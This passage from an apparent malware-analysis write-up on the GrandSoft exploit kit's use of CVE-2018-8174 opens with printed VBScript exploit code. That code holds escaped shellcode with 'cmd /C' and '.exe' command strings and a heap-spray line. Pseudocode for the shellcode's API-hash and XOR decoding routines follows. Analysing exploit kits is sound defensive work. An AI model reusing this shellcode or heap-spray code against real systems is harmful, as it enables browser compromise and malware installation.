&"FD4%uDC57%u77FF"& UF1 &"FF0"& UF1 &"C57%u77FF"& UF1 &"FEC"& UF1 &"C57"& UF1 &"B89%uEB83%u8B4D%u0507%u1000%u0000"& UF1 &"989%uE983%u8B7B%u812F%u00C5%u0030%u5000%u5153"& UF1 &"F55%uE457%u6C68%u3233%u6800%u6873%u6C65"& UF1 &"F54%uE057%u9090%u9090%u8990%u83C5%u04EF%u07C7%u065A%u4C98%u04E8"& UF1 &"FFE%u8BFF%u8137%u00C6%u0010%u8B00%u0507%u3000%u0000"& UF1 &"B89%uEB83%u8955%u81FE%u83EE%u0000%u8900%u81F9%u8FE9%u0000%u6A00%u6A01%u5000%u5156%u006A%u57FF%u83FC%u05F8%uD374%u006A"& UF1 &"E6A%u57FF%u72C0%u7500%u6E00%u6100%u7300%u0000%u6300%u6D00%u6400%u0000%u2500%u7300%u2200%u2500%u7300%u2200%u0000%u2500%u2F73%u6425%u2500%u7300%u2500%u6400%u2E00%u6500%u7800%u6500%u0000%u6300%u6D00%u6400%u2000%u2F00%u4300%u2000%u0000"& U88 &"00"& UF1 &"DBA"& UF1 &"FFF%u6FD0%u26FD%u6F8A%u13C6%u3B42%u208B%u8E70%u1022%uB1AD%u4F89%u8EF8"& UF1 &"470"& UF1 &"C13%u638D%uB973%u01D5%u1DF9%uA97F%u70B5%uA596%u709F%uA596%uC2C2%uBE70%uA391%uB75F%uAE00%uBCB9%uE926%u639E%uD37E%u88A8%u0000%u0000" & outStr )
G00001152223246=G00001152223246 & String((&h80000-LenB(G00001152223246))/2,Unescape("%u4141"))
c111111=G00001152223246
End Function

Shellcode

Shellcode calls API using hash, however this hash differs from well-known one.




Shellcode Hash Algorithm is ror14AddHash32.
pseudocode is as follows:

acc := 0;
for c in input_string {
acc := ROR(acc, 14);
acc := acc + c;
}
view raw ror.go hosted with ❤ by GitHub


Shellcode uses GetTickCount function to generate keys.


Decoding algorithm was not changed as of vbs.


pseudocode is as follows:

for ($i = 0; $i < strlen($enc_binary); $i++) {
$key = ($key + 0xAA) & 0xFF;
$key = $key ^ 0x48;
$data[] = chr(ord($enc_binary[$i]) ^ $key);
}
view raw decode.c hosted with ❤ by GitHub

Conclusion

GrandSoft got CVE-2018-8174. This may be a bit more powerful. Shellcode is a little characteristic. Enjoy analysis of shellcode!